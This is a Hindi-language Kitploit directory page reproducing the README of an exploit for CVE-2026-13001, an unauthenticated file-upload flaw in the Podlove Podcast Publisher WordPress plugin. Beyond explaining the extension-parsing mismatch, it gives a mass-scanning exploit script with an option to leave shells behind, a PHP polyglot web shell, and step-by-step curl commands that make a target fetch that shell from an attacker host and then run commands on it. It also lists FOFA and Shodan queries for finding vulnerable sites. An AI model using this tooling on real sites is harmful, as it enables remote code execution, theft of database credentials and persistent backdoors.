Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-13001 — Podlove Podcast Publisher: is_image() बनाम extract_file_extension() बेमेल के माध्यम से बिना प्रमाणीकरण के फ़ाइल अपलोड RCE | CVSS 9.8 | Kitploit
उपकरण/GitHubGitHub/shinthink/cve-2026-13001
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubshinthink/cve-2026-13001

CVE-2026-13001

Podlove Podcast Publisher: is_image() बनाम extract_file_extension() बेमेल के माध्यम से बिना प्रमाणीकरण के फ़ाइल अपलोड RCE | CVSS 9.8

रिपॉजिटरी देखें
21 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-13001 — Podlove Podcast Publisher अनप्रमाणित फ़ाइल अपलोड RCE

is_image() बनाम extract_file_extension() बेमेल → PHP पॉलीग्लॉट अपलोड


अवलोकन

CVE-2026-13001 Podlove Podcast Publisher WordPress प्लगइन संस्करण ≤ 4.5.1 में एक गंभीर-स्तर (CVSS 9.8) अनप्रमाणित मनमाना फ़ाइल अपलोड भेद्यता है।

यह भेद्यता दो आंतरिक फ़ंक्शनों के बीच बेमेल का फायदा उठाती है जो फ़ाइल एक्सटेंशन को अलग-अलग तरीके से पार्स करते हैं:

  • is_image() basename() का उपयोग करता है जिसमें क्वेरी स्ट्रिंग शामिल होती है → URL shell.php?.gif को .gif के रूप में दिखाता है ✅ (मान्य छवि)
  • extract_file_extension() केवल parse_url() पथ का उपयोग करता है → .php लौटाता है → फ़ाइल .php एक्सटेंशन के साथ सहेजी जाती है 🚨

हमलावर GIF89a PHP पॉलीग्लॉट अपलोड करते हैं (मान्य GIF हेडर + एम्बेडेड PHP) जो छवि सत्यापन पास करते हैं लेकिन एक्सेस करने पर PHP के रूप में निष्पादित होते हैं।

प्रभावित संस्करण

संस्करणस्थिति
≤ 4.5.1असुरक्षित
4.5.2+पैच किया गया

खोजकर्ता: Wordfence के माध्यम से Talal Nasraddeen (14 जुलाई, 2026)


भेद्यता तंत्र

मूल कारण

root@kitploit:~
// is_image() — uses basename() which includes query string
function is_image($url) {
    $ext = strtolower(pathinfo(basename($url), PATHINFO_EXTENSION));
    return in_array($ext, ['jpg','jpeg','png','gif','webp']);
}
// URL: https://attacker.com/shell.php?.gif
// basename() → "shell.php?.gif" → ext = "gif" ✅ BYPASSED
root@kitploit:~
// extract_file_extension() — uses parse_url() path only
function extract_file_extension($url) {
    $path = parse_url($url, PHP_URL_PATH);
    return pathinfo($path, PATHINFO_EXTENSION);
}
// URL: https://attacker.com/shell.php?.gif
// parse_url() → "/shell.php" → ext = "php" 🚨 SAVED AS .php

हमला प्रवाह

root@kitploit:~
1. Attacker hosts GIF89a PHP polyglot at attacker.com/shell.php?.gif
2. GET /?podlove_image_cache_url={hex(url)}&podlove_file_name=test
3. is_image() validates .gif extension → PASS
4. Plugin downloads file → saves as test_original.php in cache/
5. Attacker accesses /wp-content/cache/podlove/{hash}/test_original.php
6. PHP executes → RCE

स्थापना

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-13001.git
cd CVE-2026-13001
pip install -r requirements.txt

उपयोग

root@kitploit:~
# Single target
python cve_2026_13001.py -t target.com

# Mass scan
python cve_2026_13001.py -f targets.txt -o shells.txt

# Custom payload URL
python cve_2026_13001.py -t target.com --payload-url https://yourserver/shell.php?.gif

# Debug mode, leave shells
python cve_2026_13001.py -t target.com --debug --no-cleanup

तर्क

root@kitploit:~
  -t, --target       Single target (domain or IP)
  -f, --file         Target list, one per line
  -o, --output       Save RCE URLs to file
  --payload-url      URL hosting the PHP polyglot (default: GitHub raw)
  --threads          Concurrent workers (default: 30)
  --no-cleanup       Leave shells on target
  --debug            Show every HTTP request
  -v, --verbose      Verbose output

प्रूफ ऑफ कॉन्सेप्ट

एकल लक्ष्य

root@kitploit:~
$ python cve_2026_13001.py -t podcast-site.com
root@kitploit:~
  Podlove Podcast Publisher | CVE-2026-13001 | CVSS 9.8

  Host       : podcast-site.com
  Podlove    : YES v4.5.1
  Upload     : YES
  RCE        : YES
  Shell      : https://podcast-site.com/wp-content/cache/podlove/a1/b2.../think_xxx_original.php?t=TOKEN
  Output     : uid=33(www-data) gid=33(www-data)
  Time       : 4.2s

बड़े पैमाने पर स्कैन

root@kitploit:~
  Targets: 500  |  Threads: 30
  Payload URL: https://raw.githubusercontent.com/shinthink/payloads/main/shell.gif

  [RCE] podcast-vuln-01.com       https://podcast-vuln-01.com/wp-content/cache/podlove/...
  [150/500] 30% | Det:42 RCE:8

मैन्युअल शोषण

चरण 1 — पॉलीग्लॉट शेल होस्ट करें

root@kitploit:~
// shell.php — save and host on your server
GIF89a<?php system($_GET['c']); ?>

चरण 2 — बायपास के साथ URL को हेक्स-एन्कोड करें

root@kitploit:~
# URL: https://attacker.com/shell.php?.gif
echo -n "https://attacker.com/shell.php?.gif" | xxd -p | tr -d '\n'

चरण 3 — कैश डाउनलोड ट्रिगर करें

root@kitploit:~
curl 'https://target.com/?podlove_image_cache_url=68747470733a2f2f...&podlove_file_name=shell&podlove_width=100&podlove_height=100&podlove_crop=0'

चरण 4 — शेल तक पहुँचें

root@kitploit:~
# Path: wp-content/cache/podlove/{h[:2]}/{h[2:]}/{name}_original.php
curl 'https://target.com/wp-content/cache/podlove/a1/b2c3.../shell_original.php?c=id'

FOFA / Shodan

root@kitploit:~
FOFA:   body="podlove-podcasting-plugin-for-wordpress"
Shodan: http.html:"podlove"

प्रभाव

सफल शोषण से वेब सर्वर उपयोगकर्ता के रूप में रिमोट कोड निष्पादन प्राप्त होता है:

  • wp-config.php निकालें → डेटाबेस क्रेडेंशियल
  • सभी WordPress सामग्री, उपयोगकर्ताओं और प्लगइन डेटा तक पहुँच प्राप्त करें
  • स्थायी बैकडोर तैनात करें
  • आंतरिक नेटवर्क तक पहुँच बनाएं

अस्वीकरण

केवल शैक्षिक और अधिकृत परीक्षण प्रयोजनों के लिए।

लेखक दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेते हैं।


संदर्भ


Podlove से संबद्ध नहीं।

टूल डाउनलोड करें
संसाधनलिंक
Wordfence परामर्शwordfence.com
Podlove सुरक्षा रिलीज़podlove.org
NVD प्रविष्टिCVE-2026-13001
Raimu0x19 द्वारा PoCGitHub
शोधकर्ताTalal Nasraddeen